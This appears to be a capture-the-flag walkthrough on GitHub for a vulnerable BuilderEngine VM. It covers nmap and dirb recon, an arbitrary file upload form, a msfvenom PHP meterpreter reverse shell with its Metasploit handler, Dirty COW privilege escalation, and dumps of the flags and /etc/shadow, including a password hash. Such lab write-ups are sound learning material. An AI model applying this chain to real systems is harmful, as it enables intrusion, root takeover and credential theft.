Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
118 lines (108 sloc) 4.88 KB
Recon Phase:
nmap -p 1-65535 -T4 -A -v 172.16.34.154
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 aa:c3:9e:80:b4:81:15:dd:60:d5:08:ba:3f:e0:af:08 (DSA)
| 2048 41:7f:c2:5d:d5:3a:68:e4:c5:d9:cc:60:06:76:93:a5 (RSA)
|_ 256 ef:2d:65:85:f8:3a:85:c2:33:0b:7d:f9:c8:92:22:03 (ECDSA)
53/tcp open domain ISC BIND 9.9.5-3-Ubuntu
| dns-nsid:
|_ bind.version: 9.9.5-3-Ubuntu
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3?
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 33379/udp status
|_ 100024 1 42181/tcp status
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: CAPABILITY
445/tcp open netbios-ssn Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP)
993/tcp open ssl/imap Dovecot imapd
|_imap-capabilities: CAPABILITY
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2016-10-07T19:17:14
| Not valid after: 2026-10-07T19:17:14
| MD5: a32c 1b8e 97f3 210f d238 ba3d ac45 74f7
|_SHA-1: 0b7b 4229 b7af 8f89 d533 2ecf 5a1f f652 a015 0295
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3s?
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2016-10-07T19:17:14
| Not valid after: 2026-10-07T19:17:14
| MD5: a32c 1b8e 97f3 210f d238 ba3d ac45 74f7
|_SHA-1: 0b7b 4229 b7af 8f89 d533 2ecf 5a1f f652 a015 0295
|_ssl-date: TLS randomness does not represent time
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
| Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_ Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
42181/tcp open status 1 (RPC #100024)
$ dirb http://172.16.34.154
Then i played around those files then i navigated to /themes/ and those themes for BuilderEngine V3
http://172.16.34.154/themes/default_theme_2015/description.txt
Default 2015 Theme for BuilderEngine V3.
http://172.16.34.154/themes/default_theme_2016/description.txt
Default Theme 2016 for BuilderEngine V3.
==========================================================
Attacking Phase:
Ok! so i tried BuilderEngine 3.5.0 - Arbitrary File Upload exploit
https://www.exploit-db.com/exploits/40390/
<html>
<body>
<form method="post" action="http://172.16.34.154/themes/dashboard/assets/
plugins/jquery-file-upload/server/php/" enctype="multipart/form-data">
<input type="file" name="files[]" />
<input type="submit" value="send" />
</form>
</body>
</html>
Then i generated a reverse php shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=172.16.34.1 LPORT=1234 -f raw > shell.php
and then uploaded shell.php via BuilderEngine exploit
then i did setup for multihandler
$ msf > use exploit/multi/handler
$ msf exploit(handler) > set payload php/meterpreter/reverse_tcp
$ msf exploit(handler) > set lhost 172.16.34.1
$ msf exploit(handler) > set lport 1234
$ msf exploit(handler) > exploit
Then i started the php shell via http://172.16.34.154/files/shell.php
Then i got a shell
$ cat /var/www/flag.txt
bfbb7e6e6e88d9ae66848b9aeac6b289 ===> First flag
==========================================================
I used Dirty Cow https://www.exploit-db.com/exploits/40616/ to become root
i compiled it x86
$ gcc cowroot.c -o cowroot -pthread
$ ./cowroot
$ echo 0 > /proc/sys/vm/dirty_writeback_centisecs
$ id
uid=0(root) gid=33(www-data) groups=0(root),33(www-data)
$ cat /root/flag.txt
a10828bee17db751de4b936614558305 ===> Second flag
==========================================================
$ cat /etc/shadow
crackmeforpoints:$6$p22wX4fD$RRAamkeGIA56pj4MpM7CbrKPhShVkZnNH2NjZ8JMUP6Y/
1upG.54kSph/HSP1LFcn4.2C11cF0R7QmojBqNy5 ===> Third Flag
==========================================================
You can’t perform that action at this time.